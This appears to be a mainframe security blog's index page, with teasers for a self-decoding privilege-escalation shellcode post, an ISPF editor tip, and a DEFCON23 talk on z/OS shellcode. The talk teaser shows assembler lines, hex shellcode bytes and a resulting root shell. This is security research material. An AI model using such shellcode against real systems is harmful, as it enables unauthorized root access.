Shellcode Freebie!

Got a burning privesc vulnerable binary on your USS? How about feeding it a little self-decoding shellcode? (Hint: this is fully functional, find a C stub and try it yourself!) … Continue reading Shellcode Freebie!

Tips / Tricks – 7/2/15 (update)

Updated. Added update to the packet capture section below, included pcap export!

ISPF editor

Want more real estate in your ISPF editor? In an editing session, enter EDSET in the command line, then check the line marked:

X Remove action bars in ISPF edit and view panels

This will remove the menu bars and… Continue reading Tips / Tricks – 7/2/15 (update)

Mainframe shellcode

Come see my talk at DEFCON23.

…
SLR   14,14
MVC   32(4,13),16(14)
L     14,32(,13)
…
\x1f\xee
\xd2\x03\xd0\x20\xe0\x10
\x58\xe0\xd0\x20
…
# id
uid=0(IBMUSER) gid=0(SYS1)
…

Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!